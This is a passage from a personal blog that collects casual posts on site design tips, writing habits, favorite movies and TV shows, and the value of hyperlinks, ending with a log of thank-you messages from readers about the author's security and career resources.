The most memorable “wrong turn” for me however occurred when me and my wife were trying to drive back from the national park in Sintra, Portugal to where we were staying in Lisbon. We exited the park into what I imagine was the old-town part of Sintra and ended up on some very tiny streets with extremely narrow passage ways between the buildings and walls of the town. At one point, my wife had to get out of the car and help me narrowly traverse one particularly tight corridor. Our rental was a pretty small car too. Luckily, we made it out without a scratch, literally!

Thanks for reading!

Good Sitekeeping

Wed, 12 Mar 2025 13:28:00 -0400

My site is over 5 years old at this point, and in that time I have had several noteworthy site redesigns. In between those big remodels, I’ve also been near-constantly tweaking design elements, and tinkering with the CSS styling. Along the way, I’ve discovered certain site decor and design choices that I think are pleasing. Now I understand that beauty is in the eye of the beholder, which makes this quite subjective. I also am very aware that my site is probably riddled with CSS-related atrocities, accessibility faux pas, and other web design best-practice deviations. But, with all that said, here are some things I have done with my site up to this point that I think make it look and feel great. They are what make it enjoyable for me to just scroll around on and experience, even when I’m not looking for anything in particular. Sometimes I just browse and click about enjoying the UX I’ve put together.

I recommend other folks use these same techniques to make their site look better!

Pops of color
Generous margins on content pages (e.g. blog posts)
Custom ::selection coloring
Custom dark/light modes
Iconography
Little whimsical touches
Simple, clean, consistent footer & header
Content pages are for content
Page published / updated dates
Artwork!

Pops of Color

Your site doesn’t need to look like all those “professional”, boring, sterile blogs out there. Add color - everywhere! Background colors, font colors, gradients, whatever. I mean you don’t want things to be garish, but you can color things up in a way that both looks great and isn’t over the top. Here’s some of my favorite examples of how I’ve injected color into elements across my site…

My home page. Notice the subtle color-mix() backgrounds for each content stream and the slightly more pronounced border line. Awesome.

The Activity feed. Remind you of any other awesome looking design?

The Notes feed. Dynamic background colors corresponding to different syndication sources. One of my favorite ideas I’ve had.

The Infosec-Only content feed. Little color flourishes on the border-left lines corresponding to different content types.

Generous Margins

On a tablet or desktop browser? Check out the left and right margins! On larger (non mobile) displays, I've given page content ample margins 🤗.

For most of my pages and published content, I’ve allowed for generous margins by setting the content width to max-width: 800px. Not sure I can adequately describe why it makes my posts and content look better, but it just does. There are a few exceptions, notably my home page and the statboard which have nearly-full-width margins. For those pages, I am emphasizing information density so I need that extra horizontal space.

Custom ::Selection Highlighting

I hadn’t ever considered doing this and then I think I got the idea from Cory. Try highlighting some text on this page (this won’t work on mobile)… Kinda fun right? I don’t see a lot of sites implement this (maybe because of the accessibility pitfalls?) but I think it’s just a hella delightful touch. It’s giving very bespoke, artisinal experience. You can do something similar by setting the ::selection CSS pseudo-element.

Dark / Light Modes

Besides catering to the personal preferences of your readership (à la prefers-color-scheme), having different themes is just a fun way to experience your site in (literally) different lights from time to time. A change of scenery if you will.

Icons

Sprinkle your site with emojis and other icons. On this site, I use Phosphor. It breaks up the monotony of text, and it’s just fun.

Whimsical Touches

I’m real big on this one. The web should be fun. Life could use a bit more whimsy if you ask me. Put fun li’l easter eggs and other quirky things on your site. Surprise and delight your audience. You’re only limited here by your own creativity (and willingness to learn random HTML / JS / CSS stuff). Play with colors, hide li’l images in secret places, use animations (responsibly), do something different, be unique. My Shark Fin <hr> is one of my favorite whimsical flourishes I’ve come up with for this site thus far. There’s a lot of other things to discover here too! This very page is filled with custom whimsical touches, differentiating it from other posts on this site and beyond.

Simple, Consistent Header & Footer

This is definitely related to the next item, but I’ll speak to it individually. I’ve gone through a variety of different header and footer designs. I also see a lot of other sites headers and footers in my travels across the web. I’ve found my favorite to be those that just keep it simple, light-weight and consistent across pages of the site.

After the actual content of my posts, all I have is a <hr>, a quick post meta-data block, a link to the prev/next post(s) and my shark footer. Even with just those things I’ve considered maybe taking out the prev/next links to simplify it even further. More on keeping things simple…

KISS Your Content 😘

Keep It Simple Stupid (KISS). It applies in a lot of contexts, and definitely applies to web design - especially for “content” pages (i.e. actual blog posts). Maybe this is too-opinionated, but I really don’t like when I see a blog post, especially a short post, that is followed by a gigantic footer filled with blinky 88x31 buttons, pleas to subscribe, comments, links to other posts on the site, endless dynamically loading content, etc… There’s a place for that stuff - on their own distinct pages, or on the home page, or just some place else. I just don’t like seeing each and every page on a site filled with the same junky footer cruft. Show some love to your post’s actual content, give it a KISS! </rant>

Dates (e.g. Published: Mar 12, 2025)

For the love of god, put publish dates (and preferably also updated dates) on your posts. This isn’t really a design recommendation, but I think you could say it’s a good UX requirement. Why can so many sites not figure out how to do this?

Artwork

Make some art, put it on your site. You don’t need to go overboard, but there’s a lot of your individuality that you can express through custom artwork. It doesn’t necessarily have to be something you’ve made either, you could have it commissioned for example. I have examples of artwork made by me, friends, and by others I’ve found on the Internet. What you need to 100% avoid doing however, is using AI-generated slop art. It’s lazy, looks terrible and says something, not complimentary, about your site. A crudely drawn stick figure, or just nothing is better received than something AI generated.

This Post is Me Procrastinating

Fri, 07 Mar 2025 10:38:00 -0500

I am procrastinating. Like, right now I’m doing it. I’ve got a ton of other more important things to work on - at home, at my job, even for my site. I gotta do taxes for example, *blegh*! But, I kinda don’t have the energy, or don’t feel like it, or just saw something else shiny to work on instead (e.g. this post). I am great at procrastinating. World-class even. This site makes for a fantastic vehicle by which I can constructively procrastinate. Because you see, it’s not like I’m sittin’ around doin’ nothing. I’m creating! I’m working on my site. Yeah, I’m procrastinating, sure. But what comes out of it all is something I’m proud of. So it’s completely justified right? I’m sure you’re nodding your head right now in agreement, and I appreciate that.

Hum-dee-dum-dee-dooooo

* spins around in swivelly chair *

What else can I yap about here instead of just publishing this and moving on to my actual to-do list? Hrmmm…

I’m kinda hungry. Let me do a web search for “eating procrastinating”. Oh look at that! I just learned about the term “procrastineating”. This is perfect for me right now.

* stomach audibly grumbles *

OK, I’ma go - make myself a li’l snacky-snack. When I get back down to my office I’m totally goin’ to get right into the stuff I need to do. 😉

Guiding Principles

Thu, 06 Mar 2025 08:56:00 -0500

Documented below are the guiding principles by which I approach how I work on, and write for shellsharks. These tenets are foundational across my site and are core to who I am as a human.

My site is meant to be fun—for me, and for whomever comes here.
So I purposefully imbue this site with an unapologetic whimsy.
It’s a place to be uniquely me—my aesthetic, my writing style, my art, my topics.
I don’t box myself in creatively. I am free to write across all genres. It’s been Infosec, Technology, and Life-in-general from the beginning.
It is a place for me to learn, to teach, to “pay it forward”.
I write with a beginners mindset. I want what I write to be a reference for myself and available to be consumed by all.
Every page is a living document, I always reserve the right to change my mind, or add new content.
It is a way for me to connect—to be a part of, and build community.
Shellsharks is a central, canonical point of presence for myself on the web. I am shellsharks.

Thanks to Tracy and James for inspiring this write-up.

This is a /why page.

Writing Mannerisms

Wed, 05 Mar 2025 23:14:00 -0500

I enjoy writing, it’s why I have this blog. But my style is far from perfect in the technical sense. I’m very aware of the many interesting and possibly unique writing quirks and habits I have. So, here I reflect on and catalog those distinct writing mannerisms.

I think my most prevalent (bad) habit is run-on sentences, they are everywhere! I consider my style of writing to be very conversational in its cadence, and in this way it tends to mirror my speech in many respects, and I’ve been known to be a bit of a looooong-talker.
Alright, I’ve mentioned that my writing is very conversational. In this vein, I use a lot of linguistic affects like “ok”, “right”, “alright”, “so”, etc… I tend to use these at the beginning of sentences.
I like to use hyphens (“ - “) to bridge two sentences together - joining separate, but related ideas or thoughts together in a way that a standard period doesn’t seem suited for and where a comma just wouldn’t supply the correct tempo to.
I really use a lot of font styles, e.g. italicizing, underlining and bolding. I’d describe my methodology for employing these styles as very vibes-based, with no real strict convention. This said, italics are generally reserved as a way for me to emphasize words as I would do if I was actually speaking them in conversation. Bolded terms are meant to highlight the main point or topic of a paragraph / section. More recently, I’ve also started underlining things and don’t really have a specific usecase for when I typically deploy it.
I love links. I spend a lot of time linking out to things locally within a page (to a section anchor for example), internally to my site as well as externally across the web. These links are typically inline, rather than explicit URLs or list(s) of references.
My life is very list-driven, the way I think is often very list-based, and so it follows that my writing features a lot of lists. This blog post is essentially one big list!
I do a lot of parenthetical asides. For whatever reason, I very-frequently (and am literally going to do it right here) inject my own commentary and bonus context smack-dab in the middle of my sentences. When doing so, I tend to italicize the aside 🤷‍♂️.
This one really bugs me - I have the annoying habit of using “it’s” when I just need to say “its”. This site has seen it since it’s inception…
I’m too often unsure of whether I should use the word “their” or “there”. (But don’t worry, I’m good on when to use “they’re” 😄). There’s (⬅️ this one right?) gotta be a way to easily remember which to use…
I use a lot of e.g.’s and i.e.’s (I’m sure incorrectly in many cases) and though I’ve looked up their meanings many-a-time (e.g. literally as I write this) I always seem to forget the distinction shortly after (i.e. I often can’t remember even after just reading the definitions of the two terms). So, for current and future me, e.g. stands for “exempli gratia” or “for example” and i.e. stands for “id est” which means “in other words”. SMUSH IT INTO YOUR BRAIN~!!
HTML supports 6 Section Heading elements, h1 through h6. I’m somewhat inconsistent in how I deploy them in my posts, it’s all very vibes-ey. I’d say most of the time I stick with a standard h1 for main sections across the site, but sometimes I’ll just start with h2 instead, with no h1 as a parent section at all. Best I can explain is that sometimes I feel a post might not “deserve” a section capitalized by the largest header? I suspect this particular quirk is often seen across my short-form notes.
I’m super inconsistent about grammatically sticking to first-person or second-person. You’ll notice this quite often I’m sure.
Rather than just ending a paragraph or section gracefully with a period, I’ll often just end it with a nice set of ellipsis. Usually this denotes that the next section, paragraph, list, image, or whatever is directly related to what I was just talking about. Like with many of my writing peculiarties, I’m sure it’s not being used correctly…
Though I think I’ve started to improve on this, my blog posts (and other content) has never employed a large amount of pictures or graphics. The reason for this is simple - there’s quite a bit of overhead to add images to posts within my static site generator workflow.
Mirrorin’ my own in-speech linguistic tendencies once more, I do a lot of “G-dropping”, i.e. when a the ‘g’ is dropped in words that end in ‘-ing’. So in other words, I do a lot of G-droppin’. (You’ll notice here that I almost always add that li’l apostrophe when I do a G-drop.)
Emojis. Another more recent addition to my writing flare, I like to add a bit of evocation to my prose 😎.
Text walls / monolithic paragraphs are a staple of shellsharks.com. Honestly, I’ll admit that I really don’t know when to break paragraphs up sometimes. I apologize to your eyeballs.
I’ll repeat, I love writing and really enjoy tinkering around on this site. I’m passionate about this stuff, so I tend to get real excited and do a lot of exclamation points!
In reading this, or any of my other posts, would you say the tone is “conversational”? I try to use a lot of questions like these in my writing to help make it so.

That’s it for now! A lot of these call-outs are stylistic choices, while others are admittedly just bad habits or writing deficiencies that over time I’d like to eradicate. Thanks for sticking with me through all of ‘em!

Metrics That Matter

Wed, 05 Mar 2025 09:44:00 -0500

Joan Westenberg recently published a (relatively short) post titled “The Only Metrics That Matter” where she calls out a number of toxic metrics that a lot of sites and site-owners obsess over, i.e. page views, time-on-site, bounce rates, etc.. She (expertly, as usual) calls out that these are the focus because of the ad-supported business model that the modern web survives on, and that that system is not one she cares to participate in with her own site and writing. Can’t disagree with any of what she’s said so far. But she loses me a bit with the next bit. She goes on to say that…

I have two metrics that matter: newsletter subscribers and paid supporters. That’s it. To the exclusion of literally everything else.

Her job, the way she makes a living is writing. So I understand that for her, subscribers and actual paid supporters is pretty key to her maintaining a livelihood. But there’s something a little hollow there to me personally. It’s hard to quantify in metric-speak, but in saying what she has, she seems to entirely discount the geniune feedback she might receive, or the ways in which her writing may have a profound impact on her readership. To me, that should matter as a metric of sorts as well. I’m not suggesting that she use that feedback loop to influence her writing per say, I think she should continue to follow the compass she already has as I think it has proven time again fruitful in illuminating very important things.

I too write for myself, and don’t capture any metrics whatsoever. But I’ll admit, my situation is different. I don’t write to survive so I can afford to not care about metrics or subscribers or anything. But I do care, and take to heart the ways in which things I have put out in the world have had any small amount of impact on those who have been kind enough to read and send me feedback. My writing, what I do on my site, will always be free from analytic-influence, corporate control, ad-revenue, traffic-chasing or anything else.

To caveat all this: My disagreement (if you want to call it that) is admittedly nuanced, and she does very explicitly say that she writes “for people”. So maybe I’m reading too far into something that’s not really there. I think Joan is great, and 100% deserves at least your attention, if not your direct support, as her writing is truly amazing and something I really aspire to. So I say this to Joan - my only advice, for whatever it might be worth, is that you (and all writers) strive to value the meaningful impact their voice has on people’s perspectives, understanding and emotions. It’s a metric that matters.

Blog Questions Challenge: Movies

Wed, 05 Mar 2025 01:34:00 -0500

Taking on the Blog Questions Challenge Bot’s challenge about Movies, which asks these four questions…

What’s a movie you can practically quote from start to finish?
If you could live in any movie universe, which would you choose?
What’s the most ridiculous movie plot you’ve ever seen?
What movie snack is an absolute must-have for you?

What’s a movie you can practically quote from start to finish?

Gladiator. I’ve seen this movie countless times, and have been watching it nigh continuously for decades. Look, it’s my favorite movie, so yeah I might be biased, but Gladiator has an endless pool of quotable scenes, it’s just crazy…

My name is Maximus Decimus Meridius, commander of the Armies of the North, General of the Felix Legions and loyal servant to the TRUE emperor, Marcus Aurelius. Father to a murdered son, husband to a murdered wife. And I will have my vengeance, in this life or the next.

Hold the line! Stay with me! If you find yourself alone, riding in the green fields with the sun on your face, do not be troubled. For you are in Elysium, and you’re already dead!

At my signal, unleash hell.

I search the faces of the gods… for ways to please you, to make you proud. One kind word, one full hug… where you pressed me to your chest and held me tight. Would have been like the sun on my heart for a thousand years. What is it in me that you hate so much?

Marcus Aurelius is dead, Maximus. We mortals are but shadows and dust. Shadows and dust, Maximus!

It vexes me. I’m terribly vexed.

Are you not entertained? Are you not entertained? Is this not why you are here?

If you could live in any movie universe, which would you choose?

Harry Potter, but only if I can actually be a Wizard / non-muggle. Sure, there’s some bad stuff that goes on, y’know, in the whole he-who-must-not-be-named department, but otherwise it literally seems pretty magical to be in that universe (again, as a Wizard of course). Apparating, morphing (transfiguring) into various animals, crafting potions and generally casting a wide variety of charms and enchantments seems super fun right? I think if I had to choose a specialization, I’d go with Charms, as that seems like the classic spell-casting class that isn’t specifically dedicated to “combat” in the way “Defense Against the Dark Arts” is. Though I do love me a good magic missile…

Alas, I don’t live in the Harry Potter universe, (or I do and am just a muggle) but at least I have cybersecurity.

What’s the most ridiculous movie plot you’ve ever seen?

I might have to come back to this one later after I have time to really sit and think through the movies I’ve seen to pick out the one that really has the wildest plot… but for now I’ll just share what came to my mind first…

Ghost Ship. It’s not entirely ridiculous, at least in my opinion, but it does have a pretty wild scene (if you’ve seen it, you know what I’m talking about), and the rest of the movie is just kinda ridiculous in its own ways.

Who knows, I’ll probably come amend this in a few days after I have a chance to really think about it…

What movie snack is an absolute must-have for you?

Twizzlers are my go-to movie snack. A close second would be Sour Punch Straws, with good ol’ fashioned, heavily-buttered, popcorn taking the third spot.

Hyperspacelink Travel

Tue, 25 Feb 2025 01:11:00 -0500

Greetings weary hyper~~space~~link traveler, welcome to shellsharks dot com, a world of whimsy, infosec, technology, life, and of course, sharks! Now that you’re here, have a byte and refuel, maybe partake in some inter~~stellar~~web idea trade (e.g. email me about somethin’!), and when you’re ready to depart, I offer many <a> portal outward and onward, into the expanse of ~~space~~ the web!

I love links. They brought you here afterall! They will inevitably carry you elsewhere… They are portals to worlds immeasurable.

So yeah, let me tell ya, I’m a straight-up, certified, link fiend! Every single day I scroll through my feeds, finding, skimming & bookmarking tons of links. To places I want to share, to places I want to explore, to places I want to save and to places I will link to from this site, for your scrolling pleasure.

If you’ve been around here long you know how much I like to link to things too. Shellsharks is unlike most places on the web in that way in my humble opinion. My system for writing compels me to enrich what I write with copious links, finding every opportunity to add context and connect elsewhere, both here on this site, and to the web beyond. Contrast that with a “normal” web site. One that has at best, a sprinkling of links on any given page, and in too many cases, has a hard time even linking to source material, much less bonus or extra material.

Since the beginning, I’ve always said “what I publish here is a reference for myself…”. For me, that’s always meant adding as much as I could to my writing to help me best understand the topic at hand, both at that time, and more importantly, into the future. As I do a lot of research, this naturally means linking, and giving credit to, the vast array of sites that have contributed to my own words and understanding. This site is literally a second-brain for me in that way. For as much time as I spend elsewhere on the web, I easily spend even more time here, reading stuff I’ve already written about, trying to remember something, or looking for something I’ve said in the past to share with others.

Links mean a lot to me in how I use this site as a resource, and how I navigate its halls. But it also serves as a nice way to send traffic to other awesome places on the web. Places I’ve traveled and got something from, places I hope others travel to and enjoy. I know I personally like to see my site linked to from elsewhere. It’s a great li’l endorphine boost!

For finding stuff and generally traveling across the Internet, web search has long ruled supreme. But as the hegemonic search providers collapse into AI summary blackholes, voids that let no ~~light~~ links escape, we must learn to navigate without them. (Literally, search providers have suggested removing links in search results and replacing them with only AI summaries).

So yeah, start a blog, write cool stuff, browse the IndieWeb and link to the cool articles and sites you find. Find a site or an author you really like? Link to it in a blogroll! Find a ton of stuff and just wanna share a bunch of links regularly? Try something like this!

Here’s a li’l list of things you can do with links…

Link to a cool external site <a href="EXTERNAL LINK"></a>
Link to other pages on your own site (relative) <a href="https://shellsharks.com/RELATIVE LINK"></a>
link to a section on a page (via an anchor) <a href="#ANCHOR"></a>
Set the referrerpolicy attribute
Change how/where a link is opened via the target attribute
Create a page table of contents
Footnotes
Webmentions
Next and Previous links as part of a webring
Poetry
URL Schemes

Because this is post all about how great links are, here’s some great links…

Explore the IndieWeb
Delights of the IndieWeb
My Blogroll
My Favorite Indie Sites
What I’m Most Proud Of
Scrolls - A place with a lot of links to travel to!
Linklog - Just a log of cool places I’ve discovered across the net.
Infosec.pub - A premier Fediversian link aggregation forum.
32-Bit Cafe - A community of other folks who I bet like links.
In Praise of Links
The Hypertext Maximalist’s Manifesto

Thanks for stopping by! There’s a lot more to read here if you’re interested in stayin’. Or, you can try your luck elsewhere!

Blog Questions Challenge: TV Shows

Fri, 21 Feb 2025 00:18:00 -0500

Blog question challenge is back! This time, it’s all about TV Shows.

But first, how did we get here?

Well, I asked the Fediverse…

Post by @shellsharks@shellsharks.social

View on Mastodon

…and the Fediverse (or more specifically, Jcrabapple) responded!

Post by @jcrabapple@dmv.community

View on Mastodon

You can follow blog_challenge@beep.town to get future posts about blog challenges! Thanks Jcrabapple!

Blog Questions Challenge - “TV Shows”

This week’s Blog Questions Challenge is “TV Shows”. Here are the questions…

What TV character from a beloved show do you wish you could be best friends with in real life? [GO]
If you could binge-watch an entire series again for the first time, which one would you choose and why? [GO]
Name a TV show that changed your perspective on the world or taught you something valuable. [GO]
…and one extra bonus question, how exciting! [GO]

TV Friend

I’m goin’ Chris Turk from Scrubs. What’s not to like?! Incredibly funny, would definitely play basketball with me, can help me with my various foot injuries, and is a fiercely loyal friend. Easy choice.

Re-watch a show for the first time

Truthfully, my first thought here was Scrubs, hah! It’s probably my favorite show of all time. But honestly, it’s as enjoyable rewatching for the nth time as it was the first time, so that won’t be my choice.

Instead, I’m going to go with Dexter. Look, the entire show wasn’t perfect, but a lot of those seasons were amazing. I’m normally a sci-fi, or fantasy, or comedy-type of TV show-watcher, but something about this show I found very compelling and perfectly suspenseful.

TV show that taught me something

This was a tough one for me. A lot of the TV shows I watch are (as I mentioned earlier) in the Sci-Fi, Fantasy or Comedy realms. Not that those can’t have teaching or world-perspective-changing qualities, but it’s just not what I am looking for when I seek the escape of TV.

I do have an answer though, and it’s kinda funny… Scrubs! Maybe it’s because I’ve watched that series so many times, but I actually learned a fair bit about medical / doctor / hospital stuff from that show. And I know a lot of it is real as I have many friends/family members who are doctors who have said that things in that show are actually pretty on-point.

BONUS: TV show I would like more of

As a bonus, I’m adding an extra TV show question. The question is “Which TV show do you wish had more episodes/seasons”.

Now this is a gooooood one. As there are so many TV shows I’d like moooarrr of. I love Andor and Rings of Power, but both of those shows are already set to come back and, give us more. So instead, I’m going to choose Halo. I know, I know. Halo wasn’t the best show across its two seasons, but I thought it was pretty good. I was a Halo super-fan back in the day (and very good if I do say so myself). I think that universe, and that story, has SO MUCH to offer, and would love to see it entirely explored.

Thanks for reading!

Kindness

Tue, 18 Feb 2025 09:51:00 -0500

A lot of people worry that no one will read their blog. I did too. But it turns out, not only did people find and read what I had to say, but they were nice enough to tell me they liked it too. This post is all about that. Kindness. I’m very appreciative of everyone who has taken the time to reach out and let me know they liked something they saw on my site. Thank you! 🧡

Below is just a log of nice things people have reached out to me and said. Some days, when I don’t feel like writing, or I’m just bummed about the world, maybe I can come here and remember everyone who I’ve helped in some small way and use it as motivation.

If there’s something, or someone you appreicate out there, just send ‘em a message! I’m sure it will mean a lot to them.

From Andrew (3/9/26)

Hello Mike! I was looking at examples for personal portfolios for cybersecurity, and I came across yours in a reddit and let’s just say I am very impressed with it. I thought mine was decent, but I saw yours and realized there are levels to this. I will definitely be using it as an inspiration to continue to build mine.

From Paul (3/7/26)

Hi Michael, I recently came across your Threat Modeling Field Guide, and it really helped me deepen my understanding of threat modeling. Thanks for creating it!

From Roel (2/20/26)

Just wanted to say I really enjoy reading your scrolls. Love the positive vibes, curiosity and enjoyment of the (indie)web in these dark times. I hope you enjoy writing them as much as I enjoy reading them.

From Ana (2/4/26)

Hey! I found your website, and you provide great advice for those who want to go into appsec. Thanks for that!

From Eduard (11/12/25)

Hey Michael! I came across a Reddit post and found your blog. Spent almost 2 hours reading your stuff and the resources you recommend. Thanks for all the awesome work you share!

From David (10/14/25)

I have been reading Scrolls and Shellsharks for several months now and I very much appreciate your work. I joined the Fediverse via Mastodon a couple of years ago, but I only recently became aware of the Indieweb/Smallweb movements through sites like yours…

Your articles, and many others that you refer to, inspired me to give it another try.

From Angel (9/8/25)

Scrolling through and reading posts on the r/cybersecurity subreddit on Reddit, I came across with one of your comments. From there I clicked onto your resume link on shellsharks and spent the last hour reading your educational background. I am newly transitioning careers into the tech world and I can already see myself referencing the information and advice you’ve put together. Thank you!

From Lander (4/18/25)

Just stumbled across a comment on the /Cybersecurity Reddit where you linked your Shellsharks website. I must say what a big resource and for that I wanted to briefly thank you personally.

…So once again a big thank you and I will be definitely will be using your website as a companion in landing a more specialized vulnerability management role!

From Philipp (4/9/25)

Thanks for putting out so much great content, I really enjoy reading from you and find myself quite regularly exploring your site.

From Ruben (4/9/25)

I’m very grateful to all those great people with fun personal websites who inspired me to bring my own site back to life. There are too much to list, but special thanks to @shellsharks…

From Arjun (4/4/25)

I just wanted to reach out and say a big thank you. Your work on Shellsharks and especially your article on why people should blog. It pushed me to finally start my own blog—even though it’s super basic right now and nowhere near as cool as Shellsharks!

I’ve built this space to share my work, explore interesting cyber threats, and document my learnings. My goal over the next few months is to stay consistent, keep improving the site, and use it as a platform to grow and contribute to the community.

It’s been a great learning experience so far, and I owe a lot of that inspiration to you…

Thanks again for doing what you do—it genuinely sparked something for me.

From Franklin (3/27/25)

Wanted to write a quick note and say thank you for the time, effort, and thoughtfulness you put into the Vulnerability Management Bootcamp.

I’ve been trying to break into the security space for a few years now. I worked my way up from a desktop support intern to a senior analyst and earned a few certifications along the way—but I never quite had the opportunity to pivot into a full-time security role. At times, I honestly questioned whether the field was just too saturated or if IT folks simply weren’t being given a shot in CyberSec.

Then I came across your course. I took my time and went through it thoroughly in preparation for a Security Analyst interview with a Vulnerability Management team. The bootcamp gave me so much confidence heading into the interview and it also gave me so many things to talk about. Long story short, I was able to impress the panel and I just received a job offer today – my first CyberSec role. I look forward to checking your content more and more.

From Nakul (3/14/25)

I came across your blog (Shellsharks) while I was browsing the web for cybersec resources I found it quite insightful.

From Kai (3/7/25)

also, your website is flipping awesome. Subscribed!

Also, I might be stealing some ideas for my own site eventually 🙈

From Tyler (3/5/25)

I’m Tyler, an infosec enthusiast working toward a career in the field. I came across your blog a month or so ago while researching inspiration for my own portfolio and blog. I loved the site theme and found your content incredibly interesting and engaging.

On (3/5/25)

For real, give @shellsharks@shellsharks.social a follow. Always good stuff.

From Himanshu (3/4/25)

…Great work and I appreciate the work and the amount of effort you have taken to make one…

From Zak (3/3/25)

Your website is absolute killer. You’ve got the absolute knack for linking resources to relevant things, whilst keeping the momentum of the message you’re writing. I usually have CTRL held down as I read and click as I go. I always prepare myself for some rabbit-hole when your posts appear in my RSS feed. Your hyper(space)link travel post is an inspiration. I love a well-linked site so hopefully some others pick up the nudge too. I am meaning to do a similar post in the near future.

From Phillip (2/28/25)

love your scrolls newsletter 😍 . Always so much to discover.

From Moahmed (2/24/25)

I just want to say your indie blog website, https://shellsharks.com, has been a big inspiration for me and has helped me gain a huge amount of insight. It inspired me so much, I actually made my own indie blog website.

From Jeffrey (2/24/25)

And your website is really cool, which must indicate that its owner is also really cool! I will add it to my indieroll ^_^

From John (2/20/25)

I love this! Such a neat touch of personality.

Bravo, Poseidon or Aquaman or somethin’.

From John (2/18/25)

as an aside, I continue to be enamoured with your site. Its such a clean design and layout, with a focus on text readability, along with having a fantastic wealth of information on it.

I also love that it’s a static-generated site and not $blog_platform. I’ve tried so many times to investigate static site generators, but could never close the gap between ease of use and ease of use and aesthetic.

From Ishmael M. (2/18/25)

Hi Michael! I’ve been reading your Shellsharks blog posts and there are some great gems in there. It’s been great reading them.

From Hedy (2/18/25)

I love the design of your site, and even moreso the thorough overview of its architecture. You’ve been added to the webring, welcome!

From Arjun T. (2/18/25)

Hello Michael, It feels honoured to be connected. I have no questions or the need to ask for advice from you. Just wanted to tell you, I am a huge fan of shellsharks. A huge fan. I have been checking out the site for a long time and only today I visited to about page and found you. From a reddit comment. I went “AHHH NO WAYYY! IT IS HIMM” Love your work. Keep doing it. Keep inspiring us.

From Bob (2/13/25)

I love it! I like how you’ve “surfaced” recent posts, notes, etc. The old design is also great, but I think you’ve taken it up a notch or two with this one. Nice work!

From Eliezer G. (1/3/25)

Here from shellsharks amazing stuff !

From AK H. (11/10/24)

My name is A.K., and I currently work as a systems administrator for the University of Maryland’s helpdesk, a position I’ve held for several years. I’m now exploring a transition into the vulnerability management and information security industry, and I wanted to express my sincere appreciation for the resources you’ve shared in the VM Bootcamp and the Shell Sharks podcast.

Your bootcamp content and podcast discussions have been an incredible guide as I consider this shift. I’m grateful for the clarity and depth you provide, which are especially valuable for someone new to the field. I did notice that the bootcamp was published in April 2021, and I’d love to hear if you feel the guidance you’ve shared remains current or if there are updates or additional resources you’d recommend.

Thank you again for your commitment to helping people like me enter this field with confidence. I look forward to any advice you may have!

From James F. (10/21/24)

Hi Michael, I found your insights on Shellsharks.com very helpful and would like to use them for a career exploration assignment. I’d love to connect and explore your work further. Thanks!

From Sahil S. (10/8/24)

I came across your blog ShellSharks from one of your Reddit replies and it rocks … Would love to connect with you.

From Martin I. (10/7/24)

Just wanted to drop a note to say I enjoy the blog and site in general. Greetings from Switzerland

From Pete M. (10/6/24)

Your website continues to be one of my favourites out of the 300+ I follow in my RSS…

From Andrew K. (9/29/24)

Hi Michael, I found your LinkedIn via your site. Just a note to say thank very much for your wise, insightful, fair, and constructive comments you post on Reddit. much appreciated! Best,

From Imri A. (9/28/24)

I recently came across your website and was impressed by your content. I would love to explore potential collaboration opportunities with you.

From Josh W. (9/18/24)

I was doing some research to find good resources for newbies into VM and Reddit pointed me to your write up on Shellsharks. Thank you for putting the time into this content!

From Justin K. (9/18/24)

Hey, I saw your post on Reddit about setting up a profile website, and your looked really good so I thought I’d drop a line! Killer work btw! if your ever interested in having a IOT person on the show let me know :-D

From Jason K. (9/12/24)

Thank you for https://shellsharks.com/, it has been incredibly insightful and interesting to read; especially the vulnerability management advice!

From Pratik L. (9/12/24)

Big fan of shellsharks.com Awesome work🎉

From Oleksii A. (8/20/24)

Hi Michael, i’ve been reading shellsharks for a while. Really like how structured information on your site is. Enjoying every article. Will be happy to add you to my network.

From Jacob L. (8/13/24)

Saw your “Getting into Information Security” post on Shellsharks. Solid work.

From Flavian M. (7/18/24)

Hi! Would like to connect! Will you finish your CIS top 20 post? Amazing work.

From Jason N. (6/26/24)

Your post about threat modeling is awesome. I learned a lot from it.

From Bibash R. (6/24/24)

I just came to connect to say I’ve been reading a few of your blogs on shellsharks and really enjoy the content you put out!

Special favourite to the InfoSec tools you use to gauge the sorts of tools professionals like your self uses, but to be honest I was very surprised at the vast quantity of tools you use for each sector!

From William I. (5/29/24)

Hi Mike, how are you? I came across shellsharks.com while surfing the net few days ago. I thought your write ups were cool and informative, hence the connection.

From Shakar M. (5/27/24)

Great connecting with you. I just wanted to send a thank you note for all the stuff you put out from the podcast to the blogs. They are really helpful for someone who is starting out.

From Veronica G. (5/21/24)

Just came across your shellsharks site as I try to make a career pivot. Phenomenal content there!

From Noah P. (4/21/24)

I came across your website “shellsharks.com” in a reddit thread while researching best ways to create a cyber security e-portfolio. You have some great material on your website!

From Daanish A. (4/2/24)

Hi! I found your LinkedIn while reading your infosec playbook. It’s a really great resource, thank you so much! I’m playing on using it to help me get an internship and hopefully land a job in pen testing!

From Justin B. (3/29/24)

Thank you for your amazing website. I’m working onto my journey of infosec & threat hunting. I’m glad you made a blog of your journey and understanding.

From Sahil U. (3/28/24)

Found your website while searching for topics related to my studies. Will give your podcast a listen today.

From James A. (3/24/24)

Hi Michael, I came across your website when searching for cybersecurity blogs. And when I began to read more about you, I was intrigued and wanted to reach out and introduce myself. I am starting out in cybersecurity and looking for a mentor, is that weird to ask? All the best, J-A

When that TikTok happened… (from Marc David (3/5/24) - “It is and the entire site is an amazing resource. So far it’s one of my best performing TikTok videos. It’s really useful content.”)

From Kennedy K. (3/11/24)

Came accross the shellshark site on tiktok and decide to dive a bit deeper and conect with you since I have an interest in Cyber Security. Thanks

From Hendrik E. (7/11/23)

Hey Michael, thanks a lot for your https://shellsharks.com/threat-modeling post. I do ID³ all the time. ;-p I like threat modeling a lot and am looking for exchange. Let’s connect! Hendrik

From Syed I. (3/11/24)

Respected Sir, I am lucky to find your website, and that brought me here. I would be honored to get connected with you. I seek your mentorship.

From Romano E. (3/11/24)

Hey Michael, I saw your post on Reddit about where to find other infosec communities and gave me that boost of confidence I needed! Thank you.

From Daniel K. (3/7/24)

I stumbled across shellsharks.com while researching how to break into cyber security. Love the content!

From Rafael M. (3/4/24)

I saw a video on your website! by ByteSizedSecurity on tiktok! just following the steps lol on your steps ! Thank You for making this website!

From Refiloe M. (3/1/24)

just discovered your blog btw genius brother, I am trying to get into digital marketing and i am stealing the technique you used here to put yourself out there much respects for the creativity

From Natth M. (2/27/24)

Hi, Really enjoy shellsharks thanks for your work!

From Miguel L. (8/7/22)

